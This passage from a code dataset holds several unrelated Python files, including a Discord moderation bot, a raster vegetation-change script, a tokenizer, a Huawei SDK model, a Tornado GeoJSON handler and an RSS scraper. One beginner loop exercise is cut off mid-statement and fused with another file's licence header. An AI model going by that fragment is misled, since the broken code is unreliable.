<{user_id}> ({member.display_name})\")\n\n @staticmethod\n async def get_muted_role(guild: discord.Guild) -> discord.Role:\n roles = await guild.fetch_roles()\n return get(roles, id=Roles.MUTED.value)\n\n\n@dataclass(frozen=True)\nclass KickPunishment(OneTimePunishment):\n punishment_id = PunishmentID.KICK\n action: str = \"kicked\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await self.to_punish.kick()\n\n\n@dataclass(frozen=True)\nclass BanPunishment(TimedPunishment):\n punishment_id = PunishmentID.BAN\n action = \"banned\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await self.to_punish.ban(reason=self.reason)\n\n @classmethod\n async def unpunish(cls, user_id: int, bot: Bot) -> None:\n user = await bot.fetch_user(user_id)\n await (await bot.the_guild).unban(user)\n\n await bot.admin_log(f\"Unpunished user <{user_id}> ({user.display_name})\")\n\n\n@dataclass(frozen=True)\nclass PermaBanPunishment(OneTimePunishment):\n punishment_id = PunishmentID.PERMABAN\n action = \"perma banned\"\n\n async def punish(self, ctx: commands.Context) -> None:\n await self.to_punish.ban(reason=self.reason)\n\n\ntimed_punishment_from_id = {\n \"MUTE\": MutePunishment,\n \"BAN\": BanPunishment,\n}\n\n__all__ = [\n \"WarnPunishment\",\n \"MutePunishment\",\n \"KickPunishment\",\n \"BanPunishment\",\n \"PermaBanPunishment\",\n \"GENERIC_REASONS\",\n \"timed_punishment_from_id\",\n \"Punishment\",\n \"PunishmentID\",\n]\n","sub_path":"src/cogs/server_management/punishments.py","file_name":"punishments.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"382307019","text":"# # calculate vegetation resilience counts through time\ndef get_rep_num( x ):\n\t'''return rep number from firescar filename'''\n\tbase = os.path.basename( x )\n\treturn base.split( '_' )[ 1 ]\ndef count_transitions( arr_list ):\n\t''' \n\ttakes list of numpy ndarrays of integers and returns the number of \n\tshifts in values in the series. arr_list is expected to be in \n\tchronological order.\n\t'''\n\timport numpy as np\n\tarr_list = np.array([ np.where( arr != 0, 1, 0 ) for arr in np.diff( np.array( arr_list ), axis=0 ) ])\n\treturn np.sum( arr_list, axis=0 )\ndef open_raster( fn, band=1 ):\n\t''' remove mem leaks from stale file handles '''\n\timport rasterio\n\twith rasterio.open( fn ) as out:\n\t\tarr = out.read( band )\n\treturn arr\ndef relative_veg_change( veg_list, ncpus=32 ):\n\t'''\n\topens list of vegetation filenames into 2-d numpy\n\tndarrays and counts the number of transitons in vegetation \n\toccur by pixel through the series. \n\tArguments:\n\t\tveg_list:[list] list of paths to the vegetation output files\n\t\t\t\t\tfrom the ALFRESCO Fire Model. * expects filenames in \n\t\t\t\t\tchronological order *\n\tReturns:\n\t\t2-D numpy.ndarray of transition counts across the list of \n\t\tfilenames passed.\n\t'''\n\tarr_list = mp_map( open_raster, veg_list, nproc=ncpus )\n\treturn count_transitions( arr_list )\ndef main( args ):\n\t'''\n\trun relative flammability with the input args dict from argparse\n\t'''\n\timport numpy as np\n\n\tdirname, basename = os.path.split( args.output_filename )\n\tif not os.path.exists( dirname ):\n\t\tos.makedirs( dirname )\n\n\t# list, sort, group by replicate\n\tveg_list = [ os.path.join( root, fn ) for root, subs, files in os.walk( args.maps_path ) for fn in files if 'Veg_' in fn and fn.endswith( '.tif' ) ]\n\tyear_list = range( args.begin_year, args.end_year + 1 )\n\tveg_list = [ i for i in veg_list if int( os.path.basename( i ).split('_')[ len( os.path.basename( i ).split( '_' ) )-1 ].split( '.' )[0] ) in year_list ]\n\tveg_sorted = sorted( veg_list, key=lambda x: get_rep_num( x ) )\n\tveg_grouped = [ list( g ) for k, g in groupby( veg_sorted, key=lambda x: get_rep_num( x ) ) ]\n\t\n\t# calculate relative vegetation change -- parallel\n\t# final = mp_map( relative_veg_change, veg_grouped, nproc=int( args.ncpus ) )\n\tfinal = [ relative_veg_change( v, int(args.ncores) ) for v in veg_grouped ]\n\tfinal = np.sum( final, axis=0 ) / np.float( len(veg_list) )\n\n\t# set dtype to float32 and round it\n\tfinal = final.astype( np.float32 )\n\tfinal = np.around( final, 4 ) \n\n\t# mask the data with the out-of-bounds of Veg --> 255\n\twith rasterio.open( veg_list[0] ) as rst:\n\t\tarr = rst.read(1)\n\t\tfinal[ arr == 255 ] = -9999\n\n\t# write it out\n\tmeta = rasterio.open( veg_list[ 0 ] ).meta\n\tmeta.update( compress='lzw', dtype=np.float32, crs={ 'init':'EPSG:3338' }, nodata=-9999 )\n\t# output_filename = os.path.join( args.output_path, 'alfresco_relative_vegetation_change_counts_' + args.model + '_' + args.scenario + '_' + str(args.begin_year) + '_' + str(args.end_year) + '.tif' )\n\twith rasterio.open( args.output_filename, 'w', **meta ) as out:\n\t\tout.write( final, 1 )\n\treturn args.output_filename\n\nif __name__ == '__main__':\n\tfrom itertools import groupby\n\timport glob, os, sys, re, rasterio\n\tfrom pathos.mp_map import mp_map\n\timport numpy as np\n\timport scipy as sp\n\timport argparse\n\n\tparser = argparse.ArgumentParser( description='program to calculate Relative Flammability from ALFRESCO' )\n\tparser.add_argument( '-p', '--maps_path', action='store', dest='maps_path', type=str, help='path to ALFRESCO output Maps directory' )\n\tparser.add_argument( '-o', '--output_filename', action='store', dest='output_filename', type=str, help='path to output directory' )\n\tparser.add_argument( '-nc', '--ncores', action='store', dest='ncores', type=int, help='number of cores' )\n\tparser.add_argument( '-by', '--begin_year', action='store', dest='begin_year', type=int, help='beginning year in the range' )\n\tparser.add_argument( '-ey', '--end_year', action='store', dest='end_year', type=int, help='ending year in the range' )\n\n\targs = parser.parse_args()\n\t_ = main( args )\n","sub_path":"bin/alfresco_relative_vegetation_change.py","file_name":"alfresco_relative_vegetation_change.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"378508320","text":"#\r\n#\r\n#使用while编程实现求n-m以内的数的和!\r\nsum = 0\r\nprint(\"可以求出n到m以内所有数的和\")\r\nn = int(input(\"请输入n\"))\r\nm = int(input(\"请输入m\"))\r\nwhile n\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport sys, utils\nfrom consts import *\n\nclass token:\n def __init__ (self, token_type, value, line):\n self.type = token_type\n self.value = value\n self.line = line\n\ndef get_token_type (name):\n if utils.is_bool (name):\n return TOKEN_VALUE_BOOL\n elif utils.is_int (name) or utils.is_hex (name):\n return TOKEN_VALUE_INT\n elif utils.is_float (name):\n return TOKEN_VALUE_FLOAT\n\n return TOKEN_NAME\n\ndef print_tokens (tokens):\n print (\"Type\\tValue\")\n\n for token in tokens:\n print (token_names[token.type] + \"\\t\" + token.value)\n\ndef tokenize (code):\n name = \"\"\n is_str = False\n is_comment = False\n ignore_newline = False\n line = 1\n\n tokens = []\n\n it = 0\n while it < len (code):\n char = code [it]\n if char == '\\n':\n line += 1\n\n if is_comment:\n if char == '\\n':\n is_comment = False\n elif is_str:\n if char == '\\\"':\n tokens.append (token (TOKEN_VALUE_STR, name, line))\n name = \"\"\n is_str = False\n elif char == '\\\\':\n it += 1\n char = code [it]\n if char == '\\\\':\n name += '\\\\'\n elif char == 'n':\n name += '\\n'\n elif char == 't':\n name += '\\t'\n elif char == 'r':\n name += '\\r'\n elif char == '\\\"':\n name += '\\\"'\n else:\n name += char\n else:\n if char in \" \\n\\t()[]{}\\\\\\\"#;\":\n if name != \"\":\n tokens.append (token (get_token_type (name), name, line))\n name = \"\"\n\n if char == '(':\n tokens.append (token (TOKEN_P_OPEN, \"\", line))\n elif char == ')':\n tokens.append (token (TOKEN_P_CLOSED, \"\", line))\n elif char == '[':\n tokens.append (token (TOKEN_L_OPEN, \"\", line))\n elif char == ']':\n tokens.append (token (TOKEN_L_CLOSED, \"\", line))\n elif char == '{':\n tokens.append (token (TOKEN_A_OPEN, \"\", line))\n elif char == '}':\n tokens.append (token (TOKEN_A_CLOSED, \"\", line))\n elif char == '\\\"':\n is_str = True\n elif char == '\\\\':\n it += 1\n char = code [it]\n\n if char == '\\\\':\n it += 1\n char = code [it]\n if char == '\\\\':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\\\', line))\n elif char == 'n':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\n', line))\n elif char == 't':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\t', line))\n elif char == 'r':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\r', line))\n elif char == 's':\n tokens.append (token (TOKEN_VALUE_CHAR, ' ', line))\n elif char == '\\\"':\n tokens.append (token (TOKEN_VALUE_CHAR, '\\\"', line))\n else:\n print (\"Tokenizer Error: Expected '\\\\', 'n', 't', 's' or 'r' after \\\\\\\\\")\n sys.exit ()\n else:\n tokens.append (token (TOKEN_VALUE_CHAR, char, line))\n\n elif char == '#' or char == ';':\n is_comment = True\n else:\n name += char\n it += 1\n\n if name != \"\":\n tokens.append (token (get_token_type (name), name, line))\n name = \"\"\n\n return tokens\n","sub_path":"src/compiler_py/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"25286373","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.sdk_response import SdkResponse\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass AddCertificateResponse(SdkResponse):\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'certificate_id': 'str',\n 'cn_name': 'str',\n 'owner': 'str',\n 'status': 'bool',\n 'verify_code': 'str',\n 'create_date': 'str',\n 'effective_date': 'str',\n 'expiry_date': 'str'\n }\n\n attribute_map = {\n 'certificate_id': 'certificate_id',\n 'cn_name': 'cn_name',\n 'owner': 'owner',\n 'status': 'status',\n 'verify_code': 'verify_code',\n 'create_date': 'create_date',\n 'effective_date': 'effective_date',\n 'expiry_date': 'expiry_date'\n }\n\n def __init__(self, certificate_id=None, cn_name=None, owner=None, status=None, verify_code=None, create_date=None, effective_date=None, expiry_date=None):\n \"\"\"AddCertificateResponse\n\n The model defined in huaweicloud sdk\n\n :param certificate_id: CA证书ID,在上传CA证书时由平台分配的唯一标识。\n :type certificate_id: str\n :param cn_name: CA证书CN名称。\n :type cn_name: str\n :param owner: CA证书所有者。\n :type owner: str\n :param status: CA证书验证状态。true代表证书已通过验证,可进行设备证书认证接入。false代表证书未通过验证。\n :type status: bool\n :param verify_code: CA证书验证码。\n :type verify_code: str\n :param create_date: 创建证书日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n :type create_date: str\n :param effective_date: CA证书生效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n :type effective_date: str\n :param expiry_date: CA证书失效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n :type expiry_date: str\n \"\"\"\n \n super(AddCertificateResponse, self).__init__()\n\n self._certificate_id = None\n self._cn_name = None\n self._owner = None\n self._status = None\n self._verify_code = None\n self._create_date = None\n self._effective_date = None\n self._expiry_date = None\n self.discriminator = None\n\n if certificate_id is not None:\n self.certificate_id = certificate_id\n if cn_name is not None:\n self.cn_name = cn_name\n if owner is not None:\n self.owner = owner\n if status is not None:\n self.status = status\n if verify_code is not None:\n self.verify_code = verify_code\n if create_date is not None:\n self.create_date = create_date\n if effective_date is not None:\n self.effective_date = effective_date\n if expiry_date is not None:\n self.expiry_date = expiry_date\n\n @property\n def certificate_id(self):\n \"\"\"Gets the certificate_id of this AddCertificateResponse.\n\n CA证书ID,在上传CA证书时由平台分配的唯一标识。\n\n :return: The certificate_id of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._certificate_id\n\n @certificate_id.setter\n def certificate_id(self, certificate_id):\n \"\"\"Sets the certificate_id of this AddCertificateResponse.\n\n CA证书ID,在上传CA证书时由平台分配的唯一标识。\n\n :param certificate_id: The certificate_id of this AddCertificateResponse.\n :type certificate_id: str\n \"\"\"\n self._certificate_id = certificate_id\n\n @property\n def cn_name(self):\n \"\"\"Gets the cn_name of this AddCertificateResponse.\n\n CA证书CN名称。\n\n :return: The cn_name of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._cn_name\n\n @cn_name.setter\n def cn_name(self, cn_name):\n \"\"\"Sets the cn_name of this AddCertificateResponse.\n\n CA证书CN名称。\n\n :param cn_name: The cn_name of this AddCertificateResponse.\n :type cn_name: str\n \"\"\"\n self._cn_name = cn_name\n\n @property\n def owner(self):\n \"\"\"Gets the owner of this AddCertificateResponse.\n\n CA证书所有者。\n\n :return: The owner of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._owner\n\n @owner.setter\n def owner(self, owner):\n \"\"\"Sets the owner of this AddCertificateResponse.\n\n CA证书所有者。\n\n :param owner: The owner of this AddCertificateResponse.\n :type owner: str\n \"\"\"\n self._owner = owner\n\n @property\n def status(self):\n \"\"\"Gets the status of this AddCertificateResponse.\n\n CA证书验证状态。true代表证书已通过验证,可进行设备证书认证接入。false代表证书未通过验证。\n\n :return: The status of this AddCertificateResponse.\n :rtype: bool\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this AddCertificateResponse.\n\n CA证书验证状态。true代表证书已通过验证,可进行设备证书认证接入。false代表证书未通过验证。\n\n :param status: The status of this AddCertificateResponse.\n :type status: bool\n \"\"\"\n self._status = status\n\n @property\n def verify_code(self):\n \"\"\"Gets the verify_code of this AddCertificateResponse.\n\n CA证书验证码。\n\n :return: The verify_code of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._verify_code\n\n @verify_code.setter\n def verify_code(self, verify_code):\n \"\"\"Sets the verify_code of this AddCertificateResponse.\n\n CA证书验证码。\n\n :param verify_code: The verify_code of this AddCertificateResponse.\n :type verify_code: str\n \"\"\"\n self._verify_code = verify_code\n\n @property\n def create_date(self):\n \"\"\"Gets the create_date of this AddCertificateResponse.\n\n 创建证书日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :return: The create_date of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._create_date\n\n @create_date.setter\n def create_date(self, create_date):\n \"\"\"Sets the create_date of this AddCertificateResponse.\n\n 创建证书日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :param create_date: The create_date of this AddCertificateResponse.\n :type create_date: str\n \"\"\"\n self._create_date = create_date\n\n @property\n def effective_date(self):\n \"\"\"Gets the effective_date of this AddCertificateResponse.\n\n CA证书生效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :return: The effective_date of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._effective_date\n\n @effective_date.setter\n def effective_date(self, effective_date):\n \"\"\"Sets the effective_date of this AddCertificateResponse.\n\n CA证书生效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :param effective_date: The effective_date of this AddCertificateResponse.\n :type effective_date: str\n \"\"\"\n self._effective_date = effective_date\n\n @property\n def expiry_date(self):\n \"\"\"Gets the expiry_date of this AddCertificateResponse.\n\n CA证书失效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :return: The expiry_date of this AddCertificateResponse.\n :rtype: str\n \"\"\"\n return self._expiry_date\n\n @expiry_date.setter\n def expiry_date(self, expiry_date):\n \"\"\"Sets the expiry_date of this AddCertificateResponse.\n\n CA证书失效日期。格式:yyyyMMdd'T'HHmmss'Z',如20151212T121212Z。\n\n :param expiry_date: The expiry_date of this AddCertificateResponse.\n :type expiry_date: str\n \"\"\"\n self._expiry_date = expiry_date\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, AddCertificateResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/add_certificate_response.py","file_name":"add_certificate_response.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498521546","text":"import os\n\nimport tornado.web\nfrom torlite.core.base_handler import BaseHandler\nfrom torlite.model.muser import MUser\n\nfrom maplet.model.json_model import MJson\nfrom torlite.core import tools\n\nimport pickle\nimport json\n\n\nclass GeoJsonHandler(BaseHandler):\n def initialize(self):\n self.mjson = MJson()\n self.muser = MUser()\n if self.get_current_user():\n self.userinfo = self.muser.get_by_id(self.get_current_user())\n else:\n self.userinfo = None\n\n def get(self, url_str=''):\n if len(url_str) > 0:\n url_arr = url_str.split('/')\n\n if len(url_arr) == 1:\n rec = self.mjson.get_by_id(url_str)\n\n # 这里主要是检查一下保存成了个什么鬼。结果还是差强人意。\n # print('=' * 50)\n # xx = json.dumps(rec.json, indent=1)\n # print(xx)\n # for xx in rec.json.keys():\n # print(rec.json[xx])\n # print('=' * 50)\n # print(rec.json)\n # print('=' * 50)\n if rec:\n return json.dump(rec.json, self)\n else:\n return False\n elif len(url_arr) == 2:\n if url_arr[0] == 'download':\n self.download(url_arr[1])\n if url_arr[0] == 'delete':\n self.delete(url_arr[1])\n\n @tornado.web.authenticated\n def delete(self, uid):\n self.mjson.delete_by_uid(uid)\n\n @tornado.web.authenticated\n def download(self, pa_str):\n\n uid = pa_str.split('_')[-1].split('.')[0]\n\n self.set_header('Content-Type', 'application/force-download')\n # self.set_header('Content-Disposition', 'attachment; filename=%s' % file_name)\n rec = self.mjson.get_by_id(uid)\n\n geojson = rec.json\n\n out_arr = []\n for key in geojson.keys():\n out_arr = out_arr + geojson[key]['features']\n\n out_dic = {\"type\": \"FeatureCollection\",\n \"features\": out_arr}\n\n if rec:\n return json.dump(out_dic, self)\n\n def post(self, url_str=''):\n\n if len(url_str) > 0:\n url_arr = url_str.split('/')\n if len(url_arr) == 2:\n if self.get_current_user():\n self.add_data(url_arr)\n else:\n self.set_status('403')\n return False\n else:\n self.set_status('403')\n return False\n\n @tornado.web.authenticated\n def add_data(self, url_arr):\n\n post_data = {}\n for key in self.request.arguments:\n post_data[key] = self.get_arguments(key)\n\n geojson_str = post_data['geojson'][0]\n\n xx = json.loads(geojson_str)\n\n out_dic = {}\n index = 0\n\n for x in xx['features']:\n bcbc = x['geometry']\n if 'features' in bcbc:\n # 判断是否是空的数据。空的数据保存到数据库,加载的时候,会出现问题。\n if bcbc['features'][0]['geometry']['coordinates'] in [[], [[None]]]:\n continue\n else:\n # 这里处理新加的数据。与已有的数据不一样。\n if bcbc['coordinates'] in [[], [[None]]]:\n continue\n\n bcbc = {'features': [{'geometry': bcbc,\n \"properties\": {},\n \"type\": \"Feature\"}],\n 'type': \"FeatureCollection\"}\n\n out_dic[index] = bcbc\n index = index + 1\n\n\n\n if len(url_arr[1]) == 4:\n uid = url_arr[1]\n return_dic = {'sig': ''}\n\n cur_info = self.mjson.get_by_id(uid)\n\n # 用户的数据,不以允许其他人保存。\n if cur_info.user.uid == self.userinfo.uid:\n pass\n else:\n return_dic['status'] = 0\n return json.dump(return_dic, self)\n else:\n uid = tools.get_uu4d()\n while self.mjson.get_by_id(uid):\n uid = tools.get_uu4d()\n return_dic = {'sig': uid}\n\n try:\n self.mjson.add_or_update(uid, self.userinfo.uid, url_arr[0], out_dic)\n return_dic['status'] = 1\n return json.dump(return_dic, self)\n except:\n self.set_status(400)\n return False\n","sub_path":"maplet/handlers/geojson.py","file_name":"geojson.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"289618475","text":"# # def main():\n# # f = None\n# # try:\n# # with open('致橡树.txt', 'r', encoding='utf-8') as f:\n# # print(f.read())\n# # except FileNotFoundError:\n# # print('无法打开指定的文件')\n# # except LookupError:\n# # print('指定了未知的编码')\n# # except UnicodeDecodeError:\n# # print('读取文件时解码错误')\n# # finally:\n# # if f:\n# # f.close()\n# #\n# #\n# # if __name__ == '__main__':\n# # main()\n#\n#\n# # import time\n# # #\n# # #\n# # # def main():\n# # # print('一次性读取整个文件')\n# # # with open('test.txt', 'r', encoding='utf-8') as f:\n# # # print(f.read())\n# # # print('for-in循环逐行读取')\n# # # with open('test.txt', mode='r') as f:\n# # # for line in f:\n# # # print(line, end='')\n# # # time.sleep(0.5)\n# # # print()\n# # # print('读取文件按行读取到列表中')\n# # # with open('test.txt') as f:\n# # # lines = f.readlines()\n# # # print(lines)\n#\n#\n# from math import sqrt\n# import json\n# import re\n#\n#\n# def is_prime(n):\n# assert n > 0\n# for factor in range(2, int(sqrt(n)) + 1):\n# if n % factor == 0:\n# return False\n# return True if n != 1 else False\n#\n#\n# def main():\n# # filenames = ('a.txt', 'b.txt', 'c.txt')\n# # fs_list = []\n# # try:\n# # for filename in filenames:\n# # fs_list.append(open(filename, 'w', encoding='utf-8'))\n# # for number in range(1, 10000):\n# # if is_prime(number):\n# # if number < 100:\n# # fs_list[0].write(str(number) + '\\n')\n# # elif number < 10000:\n# # fs_list[1].write(str(number) + '\\n')\n# # else:\n# # fs_list[2].write(str(number) + '\\n')\n# # except IOError as ex:\n# # print(ex)\n# # print('写文件时发生错误')\n# # finally:\n# # for fs in fs_list:\n# # fs.close()\n# # print('操作完成')\n#\n# # try:\n# # with open('logo.png', 'rb') as fs1:\n# # data = fs1.read()\n# # print(type(data))\n# # with open('copy.png', 'wb') as fs2:\n# # fs2.write(data)\n# # except FileNotFoundError as e:\n# # print('指定的文件打不开')\n# # except IOError as e:\n# # print('读写文件时出现错误')\n# # print('程序执行结束')\n# # mydict = {\n# # \"name\": \"rock\",\n# # \"age\": 12,\n# # \"qq\": 123456789,\n# # \"friend\": [\"asd\", \"ds\", \"cx\"],\n# # \"cars\":[\n# # {\"brand\": \"BYD\", \"max_speed\": 180},\n# # {\"brand\": \"Audi\", \"max_speed\": 280}\n# # ]\n# # }\n# # mydict2 = {\n# # \"name\": \"rock-2\",\n# # \"age\": 12,\n# # \"qq\": 123456789,\n# # \"friend\": [\"asd\", \"ds\", \"cx\"],\n# # \"cars\": [\n# # {\"brand\": \"BYD\", \"max_speed\": 180},\n# # {\"brand\": \"Audi\", \"max_speed\": 280}\n# # ]\n# # }\n# # try:\n# # with open('data.json', 'w', encoding='utf-8') as fs:\n# # json.dump(mydict, fs)\n# # json.dump(mydict2, fs)\n# # except IOError as e:\n# # print(e)\n# # print('over')\n#\n#\n# username = input('请输入用户名:')\n# qq = input('请输入QQ号')\n# m1 = re.match(r'^[0-9a-zA-Z_]{6, 20}$', username)\n# if not m1:\n# print('请输入有效的用户名')\n# m2 = re.match(r'^[1-9]\\d{4,11}$', qq)\n# if not m2:\n# print('请输入有效的QQ号')\n# if m1 and m2:\n# print('你输入的信息是有效的')\n#\n#\n# if __name__ == '__main__':\n# main()\n\n#\n# from random import randint\n# from time import time, sleep\n# from multiprocessing import Process\n# from os import getpid\n# from threading import Thread\n#\n#\n# def download_task(filename):\n# print('开始下载%s...' % filename)\n# time_to_download = randint(5, 10)\n# sleep(time_to_download)\n# print('%s下载完成!耗费了%d秒' % (filename, time_to_download))\n#\n#\n# class DownloadTask(Thread):\n#\n# def __init__(self, filename):\n# super().__init__()\n# self._filename = filename\n#\n# def run(self):\n# print('开始下载%s...' % self._filename)\n# time_to_download = randint(5, 10)\n# sleep(time_to_download)\n# print('%s下载完成!耗费了%d秒' % (self._filename, time_to_download))\n#\n#\n# def main():\n# start = time()\n# # download_task('python从入门到放弃.pdf')\n# # download_task('peking Hot.avi')\n# # end = time()\n# # p1 = Thread(target=download_task, args=('pyhton从入门到放弃.pdf', ))\n# # p1.start()\n# # p2 = Thread(target=download_task, args=('peking Hot.avi',))\n# # p2.start()\n# # p1.join()\n# # p2.join()\n# t1 = DownloadTask('pyhton从入门到放弃.pdf')\n# t1.start()\n# t2 = DownloadTask('peking Hot.avi')\n# t2.start()\n# t1.join()\n# t2.join()\n# end = time()\n# print('总共耗费了%.2f秒' % (end - start))\n#\n#\n# if __name__ == '__main__':\n# main()\n\n\nfrom time import sleep\nfrom threading import Thread, Lock\n\n\nclass Account(object):\n\n def __init__(self):\n self._balance = 0\n self._lock = Lock()\n\n def deposit(self, money):\n self._lock.acquire()\n try:\n new_balance = self._balance + money\n sleep(0.01)\n self._balance = new_balance\n finally:\n self._lock.release()\n\n @property\n def balance(self):\n return self._balance\n\n\nclass AddMoneyThread(Thread):\n\n def __init__(self, account, money):\n super().__init__()\n self._account = account\n self._money = money\n\n def run(self):\n self._account.deposit(self._money)\n\n\ndef main():\n account = Account()\n threads = []\n for _ in range(100):\n t = AddMoneyThread(account, 2)\n threads.append(t)\n t.start()\n for t in threads:\n t.join()\n print('账户余额为:¥%d元' % account.balance)\n\n\n# if __name__ == '__main__':\n# main()","sub_path":"5-22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"428363895","text":"#!/usr/bin/env ipython\nimport xml.etree.ElementTree as ET\nfrom StringIO import StringIO \nimport cStringIO ,scraping , nltk , re\nfrom bs4 import BeautifulSoup\nfrom other import *\nimport dateutil.parser\nfrom datetime import tzinfo\nimport pytz , time\n\n\n\ndef conversionUTC ( Date ) :\n loc_dt = dateutil.parser.parse( Date)\n try :\n loc_dt = loc_dt.astimezone(pytz.utc).replace( tzinfo = None)\n return loc_dt.isoformat()\n except ValueError :\n tz = pytz.timezone('EST')\n return tz.localize(loc_dt).astimezone(pytz.utc).replace( tzinfo = None).isoformat()\n\ndef isodate_to_epoch( date):\n pattern = '%Y-%m-%dT%H:%M:%S'\n epoch = int(time.mktime(time.strptime(date, pattern)))\n return epoch\n\n\nclass initialisation :\n def __init__ (self, url ) :\n self.url = url\n self.list = [ ]\n self.m = scraping.Scraping(url)\n self.data = self.m.mechanize_scraping()\n self.tree = ET.parse (cStringIO.StringIO(self.data))\n self.soup = BeautifulSoup (self.data )\n\nclass rssInitialisation :\n def __init__( self , xmltree , string ) :\n self.epoch_pubdate = isodate_to_epoch(conversionUTC(xmltree.find('pubDate').text))\n self.source = string \n self.title = xmltree.find('title').text.encode('ascii', 'xmlcharrefreplace')\n self.link = xmltree.find('link').text.encode('ascii', 'xmlcharrefreplace')\n self.isodate = conversionUTC(xmltree.find('pubDate').text)\n if xmltree.find('description').text != None :\n self.description = xmltree.find('description').text.encode('ascii','xmlcharrefreplace')\n else :\n self.description = None\n\nclass tvGuideRss(initialisation) :\n def __init__ (self ,url ,epoch=None) :\n initialisation.__init__ ( self, url )\n self.epoch = epoch\n\n def returning_text (self , string ) :\n soup =BeautifulSoup (string)\n textList = [ ]\n if soup.findAll('p') != [] :\n for e in soup.findAll ('p') :\n textList.append(e.text.encode('ascii','xmlcharrefreplace') +'\\n' )\n return \"\".join(textList)\n else :\n return None\n\n def rss (self ) :\n for child in self.tree.getroot() : # channel tag\n for f in child.findall('item'):\n instance = rssInitialisation ( f , 'tvguide.com' )\n if ( instance.epoch_pubdate > self.epoch ):\n list = []\n list.append( instance.epoch_pubdate)\n list.append ( instance.source)\n list.append( instance.title)\n list.append( instance.link)\n list.append(instance.isodate)\n string = f.find('.//{http://purl.org/rss/1.0/modules/content/}encoded').text\n list.append(self.returning_text(string)[:-42])\n if f.find('.//{http://search.yahoo.com/mrss/}content') != None :\n list.append(f.find('.//{http://search.yahoo.com/mrss/}content').get('url'))\n else :\n list.append (None ) \n self.list.append(list)\n return self.list\n\nclass tvLineRss(initialisation) :\n def __init__ (self ,url ,epoch=None) :\n initialisation.__init__ ( self, url )\n 